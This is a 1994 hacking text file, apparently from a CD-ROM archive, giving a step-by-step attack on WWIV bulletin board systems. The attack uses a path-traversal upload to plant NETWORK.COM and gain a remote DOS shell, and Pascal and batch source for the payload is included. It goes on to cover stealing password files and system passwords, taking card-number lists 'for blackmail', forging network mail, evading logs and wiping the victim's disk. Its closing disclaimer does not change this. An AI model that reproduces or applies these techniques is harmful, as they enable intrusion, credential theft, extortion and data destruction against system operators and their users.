home *** CD-ROM | disk | FTP | other *** search
/ Hackers Underworld 2: Forbidden Knowledge / Hackers Underworld 2: Forbidden Knowledge.iso / HACKING / HACKWWIV.TXT < prev    next >
Text File  |  1994-07-17  |  8KB  |  213 lines

  1. (*                  Hacking into WWIV, Second Edition
  2.  
  3.                      by Vision (updated by Weasel)
  4.  
  5.          WWIV, when unmodified and when not using external
  6.     chains/protocols/programs, is essentially impregnable.  However, good
  7.     ol' Wayne Bell has also distributed the source code, external network
  8.     programs, protocol support, and other nifty benefits that have made
  9.     life for a WWIV hack much easier.  This textfile will describe the
  10.     essentials of hacking into WWIV via a hole in unregis The key here is
  11.     >unregistered<, since this hack works through DSZ's refusal to
  12.     reroute Zmodem-batch downloads without registration.
  13.  
  14. Step One:
  15.  
  16.          Call your local WWIV board under a false alias.  They are
  17.     usually struggling and haven't had the time to 'register' DSZ.
  18.     This will only work if they haven't registered DSZ!
  19.  
  20. Step Two:
  21.  
  22.          One you have an account go straight to the transfer section.
  23.     Upload (to the SysOp).  When prompted for the file name, enter
  24.     "..\..\??.???".  You'll see the Zmodem receive string.  Upload the
  25.     included file NETWORK.COM.  The BBS will say, "transfer aborted"...
  26.     but you know better!  Hang Up.
  27.  
  28. Step Three:
  29.  
  30.          Call back very shortly afterwards (thirty seconds approx.).
  31.     When you get the "NN:" prompt, enter "!-@NETWORK@-!" (again, no
  32.     quotes).  This will access the unpassworded WWIVnet account (the
  33.     password routines are external).  When the BBS sees this, it will
  34.     drop to DOS and run NETWORK.EXE.  However, since COMs are run before
  35.     EXEs, your NETWORK.COM will be executed!  NETWORK.COM then created
  36.     two batch files: HACK.BAT and DLZ.BAT.  They are as follows:
  37.  
  38.                                HACK.BAT
  39.  
  40.          DEL NETWORK.COM
  41.          CTTY COM1
  42.          COMMAND
  43.  
  44.                                DLZ.BAT
  45.  
  46.          CLS
  47.          CTTY CON
  48.          DSZ port1 speed2400 sz %1
  49.          CTTY COM1
  50.          CLS
  51.  
  52.          After NETWORK.COM has created these two files, it will run
  53.     HACK.BAT which will turn control over to COM 1 and shell to dos!
  54.     Now that you are in DOS, there are a few things that you must
  55.     immediately do.
  56.  
  57. Step Four:
  58.  
  59.          Use DLZ.BAT to leech the target's CONFIG.DAT from his main BBS
  60.     directory (the one you were dumped in when you arrived).  The format
  61.     is:
  62.  
  63.         DLZ <filename>
  64.  
  65.     where <filename> is the name of the file.  For example, 
  66.  
  67.         DLZ CONFIG.DAT
  68.  
  69.     will leech the configuration file.
  70.  
  71. Step Five:
  72.  
  73.          Go to his BBS DATA directory.  This is usually C:\WWIV\DATA, but
  74.     you might have to look around a little bit.  When you find it, use
  75.     DLZ to leech the target's USER.LST.  Using Norton Utilities or any hex
  76.     and/or text editor, it is very easy to see where the usernames and
  77.     their passwords are stored.
  78.  
  79. Step Six:
  80.  
  81.          If the target is in WWIVnet or WWIVlink, download his/her
  82.     CALLOUT.NET file from the aforementioned data directory.  This will be
  83.     explained later.
  84.  
  85. Step Seven:
  86.  
  87.     Delete HACK.BAT if you haven't already!
  88.  
  89. Step Eight:
  90.  
  91.          Look around.  Leech anything that looks interesting.  This
  92.     includes:
  93.  
  94.                 / Private G-Files from the G-File section
  95.     Good for --< Lists of credit-card or calling-card numbers
  96.     blackmail   \ Pirate files
  97.  
  98.               --> His dialing directories from Telemate or Telix; these
  99.                   usually contain passwords and numbers of private BBS's!
  100.  
  101. Step Nine:
  102.  
  103.          Hang up.  If you really hate him, upload Norton's WIPEDISK.EXE
  104.     along with the rest of the files, run it, and permanently destroy
  105.     all data on his drive.  This is generally not recommended, because
  106.     so far he has NO WAY of knowing you were in unless he watched.
  107.  
  108. ---------
  109. Tips:
  110. ---------
  111.  
  112.     a) In the target's logs, nothing will show except that you hit 'U'
  113.        when you were online and quit before the upload started.  This is
  114.        virtually always overlooked, and logs more than two days old are
  115.        usually deleted.
  116.  
  117.     b) In the target's net logs, he'll probably see a >NO NET<, which is
  118.        rather common.
  119.  
  120.     c) Very close to the beginning of CONFIG.DAT and right before the
  121.        first directory entry (usually "MSGS\") you will find the target's
  122.        SYSTEM PASSWORD.  This is needed if you are going to log on as
  123.        him or a remote sysop.
  124.  
  125.     d) If a sysop logs on, it is not noted in the LAST FEW CALLERS screen
  126.        OR the logs.
  127.  
  128.     e) A few commands that you will want to try out when you are online as
  129.        #1 are:
  130.  
  131.                 //DOS
  132.                 //UEDIT
  133.                 //BOARDEDIT
  134.                 //DIREDIT
  135.                 //GFILEEDIT
  136.                 //CHUSER
  137.  
  138.        Most require the system password, but if you're online as the
  139.        sysop you already have that.
  140.  
  141.     f) You can have great fun with planted and rouge mailing if you have
  142.        a copy of WWIV and the victim's CALLOUT.NET.  CALLOUT.NET has a
  143.        little note after every entry that looks something like:
  144.  
  145.                            "KAOIYQIGNADFUKG"
  146.  
  147.        Or another random password.  Read WWIVTECH.DOC (available on most
  148.        WWIV boards) for more information.  You should be able to pick
  149.        up/drop off mail supposedly from and to your target very easily
  150.        for about a week.  When you start getting >BAD PASSWORD<, get
  151.        back into your victim's DOS and get the passwords again!
  152.  
  153.     g) You should be able to figure out what to do with the password file.
  154.  
  155.  
  156.     h) NEVER, NEVER, NEVER press backspace when there is nothing to
  157.        backspace!  This will have catastophic effects and will definintely
  158.        crash CTTY!
  159.  
  160.     i) This file is provided to inform WWIV sysops of this threat.  If
  161.        somebody uses it for "bad" purposes, it is not my fault.
  162.  
  163. ---------
  164. COM Ports
  165. ---------
  166.  
  167.          As you may have noticed the batch files that NETWORK.COM
  168.     creates (HACK.BAT and DLZ.BAT) are created to be run on a bbs with
  169.     it's modem as COM 1.  Due to the fact that all bbs's don't use COM
  170.     1 I have included the pascal source for NETWORK.COM so it may be
  171.     edited as to turn control over to COM 2, 3, or 4.  Due to the Fact
  172.     that this entire text file has been in pascal commenting you can
  173.     use this text file as the source to compile a modified NETOWRK.COM
  174.     file. *)
  175.  
  176.     {$M 8192,0,0}          (* Leave memory for child process *)
  177.  
  178. uses Dos;
  179.  
  180. VAR
  181.  
  182.   diskfile :text;
  183.  
  184. begin
  185.  
  186.   assign       (diskfile,'hack.bat');          (* Creates: *)
  187.   rewrite      (diskfile);                     (* HACK.BAT *)
  188.   writeln      (diskfile,'DEL NETWORK.COM');
  189.   writeln      (diskfile,'CTTY COM1');         (* Change port here *)
  190.   writeln      (diskfile,'COMMAND');
  191.   close        (diskfile);
  192.  
  193.   assign       (diskfile,'dlz.bat');                   (* Creates *)
  194.   rewrite      (diskfile);                             (* DLZ.BAT *)
  195.   writeln      (diskfile,'CLS');
  196.   writeln      (diskfile,'CTTY CON');
  197.   writeln      (diskfile,'DSZ port1 speed2400 sz %1'); (* change port *)
  198.   writeln      (diskfile,'CTTY COM1');
  199.   writeln      (diskfile,'CLS');
  200.   close        (diskfile);
  201.  
  202.   SwapVectors;                                      (*****************)
  203.   Exec         (GetEnv('COMSPEC'), '/C hack.bat');  (* runs HACK.BAT *)
  204.   SwapVectors;                                      (*****************)
  205. end.
  206.  
  207. (*
  208.                       \        /
  209.                    <=---\----/--i--s--i--o--n---=>
  210.                           \/
  211.  
  212. Downloaded From P-80 Systems 304-744-2253
  213.